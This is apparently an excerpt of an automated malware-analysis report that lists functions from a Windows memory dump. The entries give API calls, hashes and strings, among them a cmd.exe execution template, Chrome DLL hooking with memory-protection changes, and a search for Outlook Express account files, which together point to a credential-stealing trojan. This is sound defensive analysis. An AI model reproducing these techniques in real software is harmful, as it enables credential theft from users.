  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2B66, Relevance: 5.2, APIs: 4, Instructions: 156 Total matches: 79memory
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
